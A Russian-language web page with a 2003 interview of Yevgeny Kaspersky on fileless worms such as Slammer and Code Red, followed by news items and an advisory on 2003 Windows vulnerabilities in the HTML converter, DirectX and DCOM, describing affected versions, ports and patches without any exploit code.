TanaT: То есть на сегодня существует два различных бестелесных вируса (Code Red и Slammer) и несколько их клонов. Я правильно понял?
Евгений Касперский: Точно.
TanaT: Бестелесные черви - это повод беспокоиться за будущее? Они открывают что-нибудь новое и сверх опасное для мира Глобальной Сети? Или это всего лишь очередной виток эволюции вредных кодов?
Евгений Касперский: Как я сказал выше, несмотря на малочисленность популяции бестелесных червей, ее опасность трудно переоценить. Главная проблема заключается в том, что скорость распространения этих червей гораздо выше, чем скорость реакции антивирусных компаний. Черви данного типа распространяются со скоростью Интернета, то есть такой "замедлитель" распространения вирусных эпидемий как человек не присутствует в цепочке распространения вируса (не надо запускать зараженный файл, не надо кликать по вложению и т. п. - вирус запускает себя сам в момент проникновения на компьютер-жертву). Скорость же реакции антивирусников - это скорость работы человеческого ума и пальцев, стучащих по клавиатуре, а эта скорость значительно уступает молниеносным интернет-эпидемиям бестелесных червей.
Таким образом, даже если в качестве решения скрестить обычный антивирус с брандмауэром и проверять на вирусы пакеты, которые будут поступать на компьютер, всё равно "пилюля" от антивирусников выйдет позже того момента, когда распространится новый бестелесный вирус. Это именно та "инфекция", которая способна парализовать Интернет за считанные минуты. Самое красноречивое подтверждение такому заключению - январская эпидемия Slammers.
На сегодняшний день профилактика, пожалуй, остается самым надежным средством противостояния подобным угрозам: своевременная установка заплаток для брешей, через которые бестелесные черви заражают компьютеры; соответствующая настройка межсетевых экранов корпоративного уровня и прочие мероприятия по улучшению устойчивости корпоративной сети. Тем не менее, нужно отдавать себе отчет в том, что это решение не абсолютно, брешей в системах безопасности очень много, а отследить всю информацию о них крайне сложно. Проблема защиты от бестелесных червей, действительно, очень актуальна.
TanaT: Не могли бы вы рассказать о новых технологиях, которые вирусописатели применяют в своих кодах? К примеру, недавний червь Sobig для увеличения эффективности своего распространения использовал спам-технологии. Есть ли еще какие-нибудь примеры?
Евгений Касперский: Прежде всего, я хотел бы уточнить. Червь для своего распространения не использовал спамерских технологий, в его коде нет ничего, что позволяло бы об этом говорить. Однако анализ технических возможностей этой вредоносной программы и темпы его распространения позволяют нам предположить, что его автор был знаком с технологией рассылки спама и с большой долей вероятности воспользовался спамерскими способами для рассылки своего сетевого червя.
Я бы не хотел превращать наш разговор в описание вирусных технологий, поэтому позволю себе ограничиться лишь несколькими примерами. Во-первых, это Slammer (или Helkern), который нарушил спокойствие пользователей Интернет в январе этого года. Этот червь незаметно проникал на компьютеры через брешь класса "переполнение буфера" (Buffer Overrun) в системе безопасности Microsoft SQL Server. Другой, более ранний пример - червь Opasoft, который заражал компьютеры под управлением Windows 95/98/ME, используя коммуникационные порты (порт 137 и 139), применяемые в Windows-сетях для обмена информацией.
TanaT: Сейчас многие обеспокоены новой версией червя Tanatos. Согласно данным "Лаборатории Касперского" червь "обладает опасной деструктивной функцией заражения файлов на жестком диске компьютера". В более подробном описании сказано: "Данная версия вредоносной программы обладает рядом опасных функций. В частности, она способна заражать исполняемые файлы многих программ, хранящихся на жестком диске, а также спровоцировать утечку конфиденциальной информации с зараженного компьютера". Можете объяснить подробно: разве червю не все равно, какой программе принадлежит тот или иной исполняемый файл?
Евгений Касперский: На сегодняшний момент существует не так много сетевых червей, которые умеют заражать исполняемые файлы. Алгоритм процедуры заражения сложный, и у каждой вредоносной программы - свой. Так, Tanatos, например, ищет определенное имя файла и, найдя его, заражает соответствующий файл. То есть заражению подвергаются только определенные исполняемые файлы.
TanaT: Некоторое время назад стояла большая шумиха по поводу червя Fizzer. Чем вызвана такая популярность этого представителя компьютерной "фауны"?
Евгений Касперский: В общем-то, это классический сетевой червь, распространяющийся по каналам Интернет. Многовекторность, то есть использование нескольких различных способов распространения, - это его отличительная, однако не уникальная особенность. Помимо рассылки по электронной почте, данная вредоносная программа содержала процедуры рассылки через P2P-сеть KaZaA. Кроме того, Fizzer обладал функциональностью backdoor-программы: мог установить клавиатурного "жучка" и троянца для удаленного управления зараженным компьютером. Антивирусные специалисты вовремя проинформировали пользователей о потенциальной угрозе, что в результате не позволило червю нанести серьезного ущерба. По нашей статистике он был четвертым в мае по количеству заражений в сети, однако с большим отрывом от тройки лидеров (после Sobig (22%), Lentin (16%) и Klez (15%) он следовал со всего лишь 0,7% от общего числа заражений).
TanaT: В феврале 2003 года по СМИ прокатилась информация, что вы и некоторые другие антивирусные эксперты заранее знали об опасности вирусов, использующих бреши в защите ПО и размножающихся без "помощи" пользователя. По слухам, вы не только знали, но и специально скрывали эту информацию, чтобы не натолкнуть вирусмейкеров на новое оружие. Это действительно так?
Евгений Касперский: Давайте разделять факты и идеи. В вопросе затрагивается две серьезные проблемы, которые необходимо осветить отдельно. Прежде всего, да, мы действительно давно знали о возможности подобных эпидемий, но сознательно не раскрывали методов их практической реализации, чтобы не стать невольными учителями вирусописателей. Вместо этого мы многократно предупреждали пользователей об угрозе и предлагали конкретные идеи по ее предотвращению.
Мы и сейчас знаем о новых реальных способах реализации глобальных вирусных эпидемий с тяжелыми последствиями, но информируем о них только узкий круг ИТ-специалистов, то есть тех, кто может решить проблему прежде, чем она станет глобальной. Например, разработчиков программного обеспечения, в котором обнаружена серьезная брешь в системе безопасности. К сожалению, в Сети есть много несознательных личностей, которых подобная информация, стань она публичной, спровоцировала бы на очередные кибер-"подвиги".
Другая сторона вопроса - заявление компании Symantec, что они действительно зарегистрировали растущие обороты эпидемии, но вовремя не оповестили об этом общественность. Если это правда, то это, конечно, малоприятный факт в деятельности компании, занимающейся безопасностью.
TanaT: Как вы думаете, а что произошло в Symantec? Ведь не каждый день эта компания признается в собственных ошибках…
Евгений Касперский: Я не располагаю информацией о том, что действительно случилось в Symantec, могу только предположить. На мой взгляд, в Symantec произошла серьезная накладка в работе информационного отдела компании, который по ошибке выдал некорректную информацию. В частности, было сказано, что компания якобы знала за некоторое время о том, что пошла эпидемия. На самом деле, наиболее вероятным было следующее: так называемые сетевые "липучки" (специальные сервера, которые мониторят атаки в Сети) в какой-то момент начали фиксировать рост SQL-запросов. Но это рабочий момент в рутинном анализе вирусной активности в Сети любой антивирусной компании, большое количество запросов необязательно свидетельствует о начале эпидемии. Мы, например, тоже зафиксировали это. Вообще, ежедневно регистрируются сотни подозрительных вещей в Сети, все они анализируются специалистами. Публичной становится информация после экспертного анализа, и лишь та, которая действительно важна для безопасности пользователей. Ведь если сигнализировать о рутине, то когда "придет настоящий волк", никто не поверит. Похоже, информационный отдел Symantec хотел похвастаться тем, что якобы раньше всех узнал об опасности, а получилось некрасивая ситуация: раз знал, зачем молчал? Поэтому и пришлось потом признать свою оплошность. Есть другой вариант развития событий: представители информационного отдела просто перепутали SQL-червя с SQL-эксплоитом, то есть с собственно примером использования этой SQL-дыры. Информация об этом эксплоите была опубликована в Сети задолго до появления червя и была известна всем, и Symantec в том числе.
TanaT: Не хотелось бы вас задеть, но все-таки, наверное, каждый может утверждать после какой-то катастрофы: "Я знал об этом, но никому не говорил". Можете прокомментировать?
Евгений Касперский: В действительности, мы не только знали, но и говорили. В 2001 г. мы неоднократно заявляли об опасности бестелесных червей и других способов глобальных атак, которые способны поставить Интернет на колени. В период 2002-2003 мы бессчетное количество раз твердили о потенциальной опасности. Кто-то смеялся, кто-то обвинял в паникерстве. И вдруг в октябре прошлого года случилась "первая ласточка" - атака на "хребет" Интернета. В январе "взорвался" Slammer. Первое событие замедлило всемирную сеть на 6%, второе на 25%. Дальше будет хуже, ящик Пандоры открыт. И причина такого развития событий в полной анархии, поглотившей Интернет.
TanaT: Есть ли какие-нибудь способы профилактики этой угрозы?
Евгений Касперский: Решение, как я уже неоднократно говорил, - безопасный, не анонимный Интернет. Интернет - это публичная сеть, такая же как автодороги, например. Представьте, если бы сейчас отменили все ПДД, права, знаки…Я, вы и практически все вокруг ездили бы, как и прежде. А какой-нибудь десятый или даже сотый процент автовладельцев воспользовался бы ситуацией и начал просто "хулиганить". Так вот, из-за этого маленького процента ездить нам с вами стало бы не просто небезопасно, а невозможно. И никакая профилактика бы не помогла.
TanaT: Под "не анонимным Интернетом" вы понимаете статические идентификационные номера?
Евгений Касперский: Я предпочитаю использовать антоним "неанонимности" - персонифицированность. Этот термин предусматривает несение субъектом ответственности за противоправные действия, причем для идентификации субъекта необходимо использовать его личный, максимально защищенный электронный "паспорт". Последнее вполне можно назвать синонимом "статических идентификационных номеров" :)
TanaT: Может ли быть такая ситуация, что создан "незаметный" вирус, размножающийся через уязвимости в ПО, без каких бы то ни было вредоносных эффектов? То есть он спокойно "ходит по планете", никого не трогает и никто его не замечает.
Евгений Касперский: Уже само его "хождение по планете" и есть вредоносный эффект. Возьмите, к примеру, СodeRed или Slammer. Они ведь ничего не уничтожали и не похищали. Они просто "ходили". Но "ходили" так, что своим избыточным трафиком перекрывали международные каналы передачи данных. То есть любой "незаметный" вирус будет замечен по мере нарастания эпидемии.
TanaT: Не кажется ли Вам, что вредные коды, распространяющиеся через "дыры" в ПО, открывают новый аспект в применении вирусов в реальных войнах? К примеру, если бы одна сторона гипотетического конфликта вовремя перевела свои базы данных с MS SQL Server на какую-нибудь другую СУБД, то она бы стала неуязвима для Helkern. То есть эффект бумеранга, когда вредный код, выпущенный в Сеть, поражает и свои приложения и чужие, будет ликвидирован.
Евгений Касперский: Теоретически это возможно, но практически - маловероятно. Можно представить, конечно, изолированное тоталитарное государство без союзников и с жесткой дисциплиной в области централизованной ИТ-политики. Но в реальной жизни я такого не встречал.
TanaT: Евгений, скажите, пожалуйста, а при анализе вирусов вы пользуетесь своими собственными инструментами или известными отладчиками и дизассемблерами? Может у вас есть свои ноу-хау инструменты?
Евгений Касперский: И то, и другое. Мы используем и разнообразные отладчики (например, "SoftICE"), используем и достаточно известный дизассемблер "IDA". Помимо этих инструментов мы активно используем и собственные утилиты, очень помогающие нам "вскрывать" и анализировать обнаруженные вредоносные программы. Однако распространяться о том, что это за утилиты, на каких принципах они действуют, мне бы не хотелось. Считайте это нашим профессиональным секретом.
TanaT: Помимо Helkern, хотелось бы обсудить с вами еще одну новость: скоро появится (уже появилась вторая бета-версия) Microsoft Office 2003, а он, судя по прогнозам, будет активно использовать XML. Многие волнуются, что в этом случае антивирусам станет намного сложнее отлавливать и детектировать макровирусы (так как XML достаточно демократичен, он не регламентирует никаких правил и ограничений на макросы). Можете успокоить или угроза действительно реальная?
Евгений Касперский: После выхода беты Office 11 (Office 2003) антивирусные компании, что называется, схватились за головы. Изменение формата документов Office в XML означало, что для отлова макро-вируса в документе надо сканировать весь документ от начала до конца. То есть все мегабайты документа с первого по самый сто-какой-то. Представляете, какая будет производительность у антивирусных программ?
К чести Microsoft надо сказать, что они серьезно отнесли к возникшей проблеме и учли важность добавления необходимой информации о наличии макросов в заголовок XML-документов. Зная внимательность и ответственность Microsoft в отношении подобных рабочих моментов, я смею надеяться, что они будут строго следовать данному улучшенному формату.
TanaT: То есть пользователи могут спать спокойно?
Евгений Касперский: Спать спокойно с надеждой на лучшее.
TanaT: Очевидно, что ПО без ошибок и уязвимостей не бывает. Многие "дыры" еще не открыты и для них не существует сервис паков. Получается, что если вирусмейкер "откопает" брешь в защите раньше производителя и напишет вирус, то любой пользователь, какое бы хорошее антивирусное ПО он ни использовал, будет просто-напросто беззащитен?
Евгений Касперский: Такое развитие событий нельзя исключать. Да, теоретически можно создать вирус, использующий брешь без патча, и который обходит антивирусные программы, поскольку на момент запуска вируса они просто не знают о такой угрозе.
Однако я бы не стал устраивать по этому поводу паники. Во-первых, для того, чтобы обнаружить новую дыру и написать соответствующий вирус, нужна соответствующая квалификация, а у вирусописателей ее попросту нет. Ведь в основном, это подростки, а их вирусы - сомнительный способ самореализации в период полового созревания. Во-вторых, на страже безопасности пользователей стоят сотни высококлассных экспертов по всему миру, задача которых - отслеживать возможные бреши в системах безопасности собственного ПО и выпускать соответствующие патчи. Тем не менее, в конце мая все-таки случился первый прецедент, когда для обнаруженной за два месяца до этого дыры в системе безопасности была написана вредоносная программа, а патча еще не существовало. Это был троянская программа StartPage, которая запускала себя абсолютно незаметно для пользователя, используя для этого брешь "Exploit.SelfExecHtml" в системе безопасности Internet Explorer. К счастью, StartPage является довольно безопасной программой. Среди ее побочных действий - модификация стартовой страницы Internet Explorer на сайт "взрослого" содержания. Естественно, мы оперативно разработали защиту и сообщили Microsoft об опасности. Хочется верить, что этот случай останется уникальным. В общем, будем надеяться на лучшее... но готовиться к худшему.
TanaT: Расскажите, пожалуйста, о недавно проведенном Ассоциацией Документальной Электросвязи совещании с участием крупнейших компаний-провайдеров. Какую роль там играла "Лаборатория Касперского"?
Евгений Касперский: За последнее время АДЭ предпринимает шаги по решению сразу нескольких проблем в существующем кибер-пространстве России. Во-первых, это вопрос о безопасности в сети, во-вторых - проблема спама. "Лаборатория" в свое время выступила инициатором встречи по проблеме безопасности. Ассоциация откликнулась на нашу идею, пригласив на беседу представителей ИТ-компаний и государственных структур, а также специалистов по информационной безопасности. Встреча оказалась полезной, была организована рабочая группа по разработке документов проекта, которые носят образовательный и рекомендательный характер. Хочется верить, что они помогут российским предприятиям и государственным структурам правильно выстроить защиту собственной информации и минимизировать, таким образом, вероятность успешной атаки. Надеюсь, что совместными усилиями мы сможем снизить уровень активности вредоносных программ в сети. Что же касается проблемы спама, то, действительно, планируется организовать встречу с провайдерами интернет-услуг. Надеюсь, что и это проект АДЭ получит дальнейшее развитие.
TanaT: А в чем на практике выльется сотрудничество ИТ-компаний и госструктур? Какие есть возможные варианты и идеи? Вы обмолвились "была организована рабочая группа по разработке документов проекта, которые носят образовательный и рекомендательный характер". Значит ли это, что будут выработаны лишь рекомендательные документы или за словом "проект" стоит что-то действительно реальное?
Евгений Касперский: Проект только начался и, в настоящий момент речь идет именно о создании ряда "рекомендательных" и "образовательных" документов. Но вы зря недооцениваете их значение. Для многих государственных и коммерческих структур он может стать "руководством" по обеспечению безопасной работы в Интернет. Прекрасно, когда в компании или организации есть отдел информационной безопасности, и его сотрудники обеспечивают бесперебойную работу всей информационной сети. Однако, к сожалению, это далеко не везде и не всегда так. Многим компаниям и государственным структурам не хватает опыта самостоятельно организовать свою безопасность, а средства на приглашение специалистов по ИТ-консалтингу не всегда есть. В результате предприятия и организации становятся жертвами атак кибер-преступников и хулиганов, а вместе с ними часто страдают и их клиенты, которые могут быть вовсе не связаны с Интернет. Пример - эпидемия "Slammer" (другое название Helkern) в январе: тогда в некоторых странах какое-то время не работали банки, не предоставляли услуги телефонные операторы. Сетевой червь нарушил жизнь тысяч людей, которые не могли снять деньги с карты или дозвониться. А случиться могут и более серьезные вещи.
В рабочей группе сегодня работают настоящие специалисты в области безопасности, которые вместе, аккумулируя собственный опыт, пытаются выработать комплекс мер по организации безопасности информации, в том числе и некие стандарты пользования каналами передачи данных. Не думаю, что в качестве главной цели проекта нужно рассматривать физическое изменение Интернета. Это высокобюджетный и технологически сложный процесс. Я неоднократно говорил, мы не специалисты по организации параллельных сетей, и это не наша задача. Но антивирусные эксперты могут привлечь к проблеме внимание Интернет-сообщества, поделиться собственным опытом, повысив тем самым общий уровень просвещенности в сфере компьютерных технологий и, надеюсь, не допустить полной деградации интернета.


13.07.2003  В Windows обнаружены три новые опасные дыры
Корпорация Microsoft выпустила сразу три бюллетеня безопасности, посвященных дырам в операционных системах семейства Windows. Все дыры при определенных обстоятельствах могут привести к выполнению на компьютере произвольного кода, но лишь одна из них настолько опасна, что носит критический характер. Две другие дыры были охарактеризованы как важные, поскольку ими нельзя воспользоваться, не имея доступа к системе в качестве зарегистрированного пользователя. Для всех уязвимостей уже выпущены соответствующие патчи.
Наиболее опасная критическая дыра была описана в бюллетене MS03-023 и имеется во всех официально поддерживаемых в настоящее время версиях Windows, начиная с Windows 98 и заканчивая Windows Server 2003. Дыра наличествует во встроенном в Windows конвертере файлов HTML. Если конвертеру направить особый запрос, вызывающий переполнение буфера, конвертер даст сбой, который позволяет хакеру выполнить произвольный код.
Поскольку конвертер HTML активно используется браузером Internet Explorer, уязвимость может использоваться удаленно. Для этого код, вызывающий сбой конвертера нужно разместить на веб-странице в Сети или в электронном письме в формате HTML. В случае Windows Server 2003 дыра не столь опасна, поскольку Internet Explorer в этой ОС по умолчанию работает в конфигурации с повышенным уровнем безопасности.
Следующая дыра, описанная в бюллетене MS03-024, содержится в операционных системах Windows NT, 2000 и XP. Она связана с некорректной реализацией в этих ОС поддержки протокола SMB (Server Message Block). При получении особым образом сформированного SMB-пакета в модуле, ответственном за его обработку, происходит переполнение буфера, которое может повлечь за собой порчу данных, зависание системы или выполнение хакером произвольного кода. Конфигурация ОС по умолчанию не позволяет использовать дыру анонимно, для этого нужно зарегистрироваться в системе, используя действующие логин и пароль. Для Windows Server 2003 данная дыра вообще неактуальна.
Последняя из дыр, описанная в бюллетене MS03-025, актуальна только для ОС Windows 2000. Она связана с компонентом Utility Manager, ответственным за управление модулями, облегчающими работу с компьютером людям с ограниченными возможностями. Utility Manager неправильно обрабатывает системные сообщения, обеспечивающие взаимодействие модуля с другими процессами.
В результате, можно заставить Utility Manager выполнить любое приложение, причем, поскольку Utility Manager выполняется с высокими привилегиями, злоумышленник сможет выполнять с компьютером любые действия, даже не будучи его администратором. Для использования дыры необходимо войти в систему в интерактивном режиме, использовать ее удаленно невозможно.


25.07.2003   Критическая дыра в DirectX ставит под удар все версии Windows
Компания Microsoft выпустила новый бюллетень безопасности, в котором предупреждает об обнаружении критической дыры, свойственной всем, без исключения, версиям набора программных интерфейсов DirectX, начиная с DirectX 5.2, поставлявшегося с ОС Windows 98, и заканчивая появившимся в конце прошлого года DirectX 9. Напомним, что DirectX представляет собой набор низкоуровневых программных интерфейсов, обеспечивающих прямое взаимодействие программ с аппаратной частью компьютера. DirectX широко используется в игровых и мультимедийных программах.
Новая дыра связана с возможностью переполнения двух буферов в модуле DirectShow. Для того чтобы вызвать переполнение, достаточно открыть особым образом составленный аудиофайл в формате MIDI. Вызвав ошибку, хакер получает возможность выполнить на компьютере произвольный код. Чтобы использовать уязвимость, хакер должен добиться открытия вредоносного MIDI-файла. Для этого файл можно разместить на сетевом диске, прислать по электронной почте, передать на дискете или компакт-диске и т.д.
Кроме того, можно встроить MIDI-файл в веб-страницу и заманить на нее пользователя или внедрить файл в электронное письмо в формате HTML. В этом случае вредоносная MIDI-последовательность будет обработана автоматически. В ОС Windows Server 2003 такой сценарий невозможен при установках браузера по умолчанию, поскольку режим повышенной безопасности браузера подразумевает отключение воспроизведения внедренной музыки. Поэтому для Windows Server 2003 уязвимости присвоен рейтинг важной, а не критической.
Начиная с 1998 года, Microsoft выпустила несколько версий DirectX и Windows, и сочетания между различными версиями этих продуктов возможны самые разнообразные. Чтобы сократить время на разработку и тестирование патчей, в Microsoft выпустили единый патч только для DirectX 9. Дыры в остальных версиях DirectX можно устранить только в их "родных" операционных системах. Для DirectX 8.1 это Windows XP и Windows Server 2003, для DirectX 7 - Windows 2000. Для Windows 98, 98SE и Me был выпущен единый патч, ликвидирующий дыры в DirectX 5.2, 6 и 7. В случае Windows NT 4 дыра заносится в систему после установки Windows Media Player 6.4 или сервис-пака для Internet Explorer 6. Соответствующие заплатки также уже выпущены.
УЯЗВИМЫЕ WINDOWS
DirectX 5.2 с Windows 98
DirectX 6.1 с Windows 98 SE
DirectX 7.0a с Windows Me
DirectX 7.0 с Windows 2000
DirectX 8.1 с Windows XP
DirectX 8.1 с Windows Server 2003
DirectX 9.0a с Windows 2000
DirectX 9.0a с Windows XP
DirectX 9.0a с Windows Server 2003
DirectX 9.0a с Windows Me
NT 4.0, использующая Media Player 6.4 или Internet Explorer 6 Service Pack 1
NT 4.0 Terminal Server Edition, использующая либо Media Player 6.4, либо Internet Explorer 6 Service Pack 1


11 сентября 2003 Три удаленных переполнения буфера в Microsoft Windows в DCOM интерфейсе (ПАТЧ)

Программа:

Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows NT 4.0 Server
Microsoft Windows NT 4.0 Server, Terminal Server Edition
Microsoft Windows NT 4.0 Workstation
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional

Опасность: Критическая

Наличие эксплоита: Нет

Описание: Три уязвимости обнаружено в Microsoft Windows в DCOM интерфейсе. Удаленный атакующий может выполнить произвольный код на системе через 135-139, 445, 593 порты и в некоторых случаях через 80(http) и 443(https) порты.

Уязвимости воздействует на DCOM (Distributed Component Object Model) интерфейс внутри RPCSS службы и связаны с переполнением буфера и неопределенной ошибкой при обработке RPC сообщений.

Две из обнаруженных уязвимостей связанны с переполнением буфера. В результате удаленный атакующий может выполнить произвольный код на уязвимой системе с root привилегиями. Третья может использоваться для аварийного завершения работы RPCSS службы.

Уязвимость может эксплуатироваться через 135 (tcp/udp), 137 (udp),138 (udp), 139 (tcp), 445 (tcp/udp),593 (tcp) порты. Также если если на сервере включена служба COM Internet Services (CIS), то уязвимость может эксплуатироваться через 80 и 443 TCP порты.

seo & website usability inet html os faq hardware faq memory video cpu hdd mainboard faq printer & scaner modem mobiles

Windows 10 | Registry Windows 10 | Windows7: Общие настройки | Windows7: Реестр | Windows7: Реестр faq | Windows7: Настроки сети | Windows7: Безопасность | Windows7: Брандмауэр | Windows7: Режим совместимости | Windows7: Пароль администратора |  |  |  |  | Память | SDRAM | DDR2 | DDR3 | Quad Band Memory (QBM) | SRAM | FeRAM | Словарь терминов | Video | nVIDIA faq | ATI faq  | Интегрированное видео faq | TV tuners faq | Терминология | Форматы графических файлов | Работа с цифровым видео(faq) | Кодеки faq | DVD faq | DigitalVideo faq | Video faq (Архив) | CPU | HDD & Flash faq | Как уберечь винчестер | HDD faq | Cable faq | SCSI адаптеры & faq | SSD | Mainboard faq | Printer & Scaner | Горячая линия бесплатной юридической консультации | Благотворительность

На главную | Cookie policy | Sitemap

 ©  2004